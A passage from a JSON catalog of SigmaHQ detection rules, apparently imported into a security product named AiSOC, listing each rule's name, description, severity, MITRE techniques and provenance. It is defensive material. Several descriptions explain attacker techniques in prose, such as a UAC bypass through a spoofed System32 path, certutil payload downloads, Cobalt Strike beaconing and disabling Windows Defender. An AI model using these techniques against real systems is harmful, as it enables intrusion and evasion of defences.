This usually is part of a publishing process but could indicate or lead to potential unauthorized exposure of sensitive information or code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1567.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-repository-pages-site-changed-to-public.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c46d4f4-a2bf-4104-9597-8d653fc2bb55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_pages_site_changed_to_public.yml" } }, { "id": "sigmahq-sigma-0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "type": "detection", "name": "Invoke-Obfuscation STDIN+ Launcher - Security", "description": "Detects Obfuscated use of stdin to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-stdin-launcher-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c718a5e-4284-4fb9-b4d9-b9a50b3a1974", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml" } }, { "id": "sigmahq-sigma-0c92f2e6-f08f-4b73-9216-ecb0ca634689", "type": "detection", "name": "PUA - Potential PE Metadata Tamper Using Rcedit", "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003", "T1036", "T1027.005", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-potential-pe-metadata-tamper-using-rcedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_rcedit_execution.yml" } }, { "id": "sigmahq-sigma-0c93308a-3f1b-40a9-b649-57ea1a1c1d63", "type": "detection", "name": "Activate Suppression of Windows Security Center Notifications", "description": "Detects the \"Notification_Suppress\" registry value being set to 1, which disables Windows Security Center notifications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/activate-suppression-of-windows-security-center-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" } }, { "id": "sigmahq-sigma-0c97c1d3-4057-45c9-b148-1de94b631931", "type": "detection", "name": "Okta Policy Rule Modified or Deleted", "description": "Detects when an Okta policy rule is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.identity" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/okta-policy-rule-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c97c1d3-4057-45c9-b148-1de94b631931", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/identity/okta/okta_policy_rule_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-0c9b3bda-41a6-4442-9345-356ae86343dc", "type": "detection", "name": "Kubernetes CronJob/Job Modification", "description": "Detects when a Kubernetes CronJob or Job is created or modified.\nA Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule.\nAn adversary can take advantage of this Kubernetes object to schedule Jobs to run containers that execute malicious code within a cluster, allowing them to achieve persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-cronjob-job-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0c9b3bda-41a6-4442-9345-356ae86343dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_cronjob_modification.yml" } }, { "id": "sigmahq-sigma-0cb8d736-995d-4ce7-a31e-1e8d452a1459", "type": "detection", "name": "Potential EventLog File Location Tampering", "description": "Detects tampering with the EventLog service \"file\" registry key in order to change the default location of an .evtx log file. This technique is used to disrupt log collection and alerting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-eventlog-file-location-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml" } }, { "id": "sigmahq-sigma-0cbe38c0-270c-41d9-ab79-6e5a9a669290", "type": "detection", "name": "Trusted Path Bypass via Windows Directory 
Spoofing", "description": "Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g \"C:\\Windows \\System32\") which can bypass Windows trusted path verification.\nThis technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.007", "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/trusted-path-bypass-via-windows-directory-spoofing.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0cbe38c0-270c-41d9-ab79-6e5a9a669290", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_win_trusted_path_bypass.yml" } }, { "id": "sigmahq-sigma-0cf2e1c6-8d10-4273-8059-738778f981ad", "type": "detection", "name": "Potential WerFault ReflectDebugger Registry Value Abuse", "description": "Detects potential WerFault \"ReflectDebugger\" registry value abuse for persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-werfault-reflectdebugger-registry-value-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"0cf2e1c6-8d10-4273-8059-738778f981ad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml" } }, { "id": "sigmahq-sigma-0cf7a157-8879-41a2-8f55-388dd23746b7", "type": "detection", "name": "Linux Recon Indicators", "description": "Detects events with patterns found in commands used for reconnaissance on linux systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1592.004", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-recon-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0cf7a157-8879-41a2-8f55-388dd23746b7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml" } }, { "id": "sigmahq-sigma-0d18728b-f5bf-4381-9dcf-915539fff6c2", "type": "detection", "name": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-cobalt-strike-dns-beaconing-dns-client.yaml", "quarantine_reason": "imported rule; 
upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_mal_cobaltstrike.yml" } }, { "id": "sigmahq-sigma-0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", "type": "detection", "name": "Ruby on Rails Framework Exceptions", "description": "Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/ruby-on-rails-framework-exceptions.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d2c3d4c-4b48-4ac3-8f23-ea845746bb1a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/ruby/appframework_ruby_on_rails_exceptions.yml" } }, { "id": "sigmahq-sigma-0d34ed8b-1c12-4ff2-828c-16fc860b766d", "type": "detection", "name": "Suspicious Processes Spawned by Java.EXE", "description": "Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. 
log4j)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-processes-spawned-by-java-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_java_susp_child_process.yml" } }, { "id": "sigmahq-sigma-0d5675be-bc88-4172-86d3-1e96a4476536", "type": "detection", "name": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-tampering-with-rdp-related-registry-keys-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d5675be-bc88-4172-86d3-1e96a4476536", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml" } }, { "id": "sigmahq-sigma-0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "type": "detection", "name": "Exports Registry Key To an Alternate Data Stream", "description": "Detects a registry key being exported into an alternate data stream (ADS) in order to hide the exported content.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exports-registry-key-to-an-alternate-data-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml" } }, { "id": "sigmahq-sigma-0d7ceeef-3539-4392-8953-3dc664912714", "type": "detection", "name": "UAC Secure Desktop Prompt Disabled", "description": "Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the \"PromptOnSecureDesktop\" value.\nThe \"PromptOnSecureDesktop\" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.\nWhen \"PromptOnSecureDesktop\" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. 
This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-secure-desktop-prompt-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d7ceeef-3539-4392-8953-3dc664912714", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_uac_disable_secure_desktop_prompt.yml" } }, { "id": "sigmahq-sigma-0d933542-1f1f-420d-97d4-21b2c3c492d9", "type": "detection", "name": "Kubernetes Unauthorized or Unauthenticated Access", "description": "Detects when a request to the Kubernetes API is rejected due to lack of authorization or due to an expired authentication token being used.\nThis may indicate an attacker attempting to leverage credentials they have obtained.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kubernetes-unauthorized-or-unauthenticated-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0d933542-1f1f-420d-97d4-21b2c3c492d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/kubernetes/audit/kubernetes_audit_unauthorized_unauthenticated_actions.yml" } }, { "id": "sigmahq-sigma-0dba975d-a193-4ed1-a067-424df57570d1", "type": "detection", "name": "Uncommon Network Connection Initiated By Certutil.EXE", "description": "Detects a network connection initiated by the certutil.exe utility.\nAttackers can abuse the utility in order to download malware or additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-network-connection-initiated-by-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0dba975d-a193-4ed1-a067-424df57570d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_certutil_initiated_connection.yml" } }, { "id": "sigmahq-sigma-0ddcff6d-d262-40b0-804b-80eb592de8e3", "type": "detection", "name": "Azure Service Principal Created", "description": "Identifies when a service principal is created in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-service-principal-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the 
AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ddcff6d-d262-40b0-804b-80eb592de8e3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_service_principal_created.yml" } }, { "id": "sigmahq-sigma-0e0255bf-2548-47b8-9582-c0955c9283f5", "type": "detection", "name": "Suspicious Reg Add BitLocker", "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-reg-add-bitlocker.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e0255bf-2548-47b8-9582-c0955c9283f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_bitlocker.yml" } }, { "id": "sigmahq-sigma-0e0bc253-07ed-43f1-816d-e1b220fe8971", "type": "detection", "name": "Potential RjvPlatform.DLL Sideloading From Non-Default Location", "description": "Detects potential DLL sideloading of \"RjvPlatform.dll\" by \"SystemResetPlatform.exe\" located in a non-default location.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-rjvplatform-dll-sideloading-from-non-default-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e0bc253-07ed-43f1-816d-e1b220fe8971", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_rjvplatform_non_default_location.yml" } }, { "id": "sigmahq-sigma-0e20c89d-2264-44ae-8238-aeeaba609ece", "type": "detection", "name": "Potential Persistence Via Microsoft Office Startup Folder", "description": "Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-microsoft-office-startup-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e20c89d-2264-44ae-8238-aeeaba609ece", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_startup_persistence.yml" } }, { "id": "sigmahq-sigma-0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "type": "detection", "name": "Office Macro File Download", "description": "Detects the creation of new Office macro-enabled files on the system by an application such as a browser or mail client.\nThis can help identify potential malicious activity, such 
as the download of macro-enabled documents that could be used for exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-macro-file-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e29e3a7-1ad8-40aa-b691-9f82ecd33d66", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_macro_files_downloaded.yml" } }, { "id": "sigmahq-sigma-0e4164da-94bc-450d-a7be-a4b176179f1f", "type": "detection", "name": "Firewall Configuration Discovery Via Netsh.EXE", "description": "Detects the use of netsh.exe to enumerate the local firewall configuration. Adversaries may look for details about the network configuration and settings of systems they access, or gather them through information discovery of remote systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1016" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/firewall-configuration-discovery-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e4164da-94bc-450d-a7be-a4b176179f1f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml" } }, { "id": "sigmahq-sigma-0e6a9e62-627e-496c-aef5-bfa39da29b5e", "type": "detection", "name": "MaxMpxCt Registry Value Changed", "description": "Detects changes to the \"MaxMpxCt\" registry value.\nMaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate.\nRansomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/maxmpxct-registry-value-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e6a9e62-627e-496c-aef5-bfa39da29b5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_optimize_file_sharing_network.yml" } }, { "id": "sigmahq-sigma-0e7163d4-9e19-4fa7-9be6-000c61aad77a", "type": "detection", "name": "CobaltStrike Named Pipe Pattern Regex", "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": 
"imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/cobaltstrike-named-pipe-pattern-regex.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_hktl_cobaltstrike_re.yml" } }, { "id": "sigmahq-sigma-0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "type": "detection", "name": "File Download with Headless Browser", "description": "Detects execution of chromium based browser in headless mode using the \"dump-dom\" command line to download files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1564.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-with-headless-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml" } }, { "id": "sigmahq-sigma-0ea52357-cd59-4340-9981-c46c7e900428", "type": "detection", "name": "Potentially Suspicious Rundll32.EXE Execution of UDL File", "description": "Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.\nThreat actors can abuse this technique as a phishing vector to capture 
authentication credentials or other sensitive data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011", "T1071" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-rundll32-exe-execution-of-udl-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ea52357-cd59-4340-9981-c46c7e900428", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_udl_exec.yml" } }, { "id": "sigmahq-sigma-0ea8db81-2ff6-4525-9448-33bbe7effc13", "type": "detection", "name": "New DMSA Service Account Created in Specific OUs", "description": "Detects the creation of a dMSASvc account using the New-ADServiceAccount cmdlet in certain OUs.\nThe fact that the cmdlet is used to create a dMSASvc account in a specific OU is highly suspicious.\nIt is a pattern trying to exploit the BadSuccessor privilege escalation vulnerability in Windows Server 2025.\nOn top of that, if the user that is creating the dMSASvc account is not a legitimate administrator or does not have the necessary permissions,\nit is a strong signal of an attempted or successful abuse of the BadSuccessor vulnerability for privilege escalation within the Windows Server 2025 Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/new-dmsa-service-account-created-in-specific-ous.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "0ea8db81-2ff6-4525-9448-33bbe7effc13", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_create_new_dmsasvc_account.yml" } }, { "id": "sigmahq-sigma-0eb46774-f1ab-4a74-8238-1155855f2263", "type": "detection", "name": "Disable Windows Defender Functionalities Via Registry Keys", "description": "Detects when attackers or tools disable Windows Defender functionalities via the Windows registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 